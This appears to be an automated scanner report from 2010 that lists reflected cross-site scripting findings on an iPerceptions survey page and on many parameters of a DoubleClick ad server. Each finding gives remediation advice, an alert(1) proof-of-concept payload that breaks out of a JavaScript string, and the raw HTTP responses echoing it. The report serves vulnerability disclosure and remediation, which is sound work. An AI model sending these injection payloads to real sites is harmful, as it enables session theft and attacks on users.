Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the sdfc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23d3f'-alert(1)-'3687970a447 was submitted in the sdfc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1.aspx?sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2 HTTP/1.1 Host: 4qinvite.4q.iperceptions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 21 Nov 2010 17:17:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Srv-By: 4Q-INVITE2 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=auwb01i1a2g3ks3mlhwi5jmt; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 1089
var sID= '24038'; var sC= 'IPE24038'; var brow= 'IE'; var vers= '7.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=299f610e-24038-38153450-25fe-438c-8517-2aca3243ff7523d3f'-alert(1)-'3687970a447&lID=1&loc=4Q-WEB2';var sGA='';function setupGA(url) { return url;}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && tCv != null) {CCook(sC,sC,30); Ld();} DCook(tC);funct ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 956a5"-alert(1)-"417ab19093e was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5956a5"-alert(1)-"417ab19093e&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f470"-alert(1)-"d3cac9a52e0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... -300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122536f470"-alert(1)-"d3cac9a52e0&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9600a"-alert(1)-"d571cc2dd60 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fsc ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fc0c"-alert(1)-"c3d973c4897 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 5%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeff"-alert(1)-"757feda799a was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http:// ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e9c4"-alert(1)-"0b886bae39e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:19 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84813"-alert(1)-"890b6b1225 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 6897 Cache-Control: no-cache Pragma: no-cache Date: Mon, 22 Nov 2010 00:13:43 GMT Expires: Mon, 22 Nov 2010 00:13:43 GMT
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 766b0"-alert(1)-"ab23b56765f was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222. ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f565a"-alert(1)-"9d4fb7009e3 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /k%3B231241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b891f"-alert(1)-"1810bff2486 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:08:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11 ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ccc4"-alert(1)-"9b23ea1ba4b was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... %3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121 ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad38"-alert(1)-"c08febe9059 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bca5"-alert(1)-"629032b61be was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6914
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... og.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c83"-alert(1)-"afe2288af06 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abbd"-alert(1)-"5fda04e4c5c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcfe"-alert(1)-"9006f31a0a5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:13:07 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25277"-alert(1)-"1ddf9b03232 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d0be"-alert(1)-"7df4c502bea was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 0%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288db"-alert(1)-"a81bde65779 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6913
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 6619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295. ...[SNIP]...
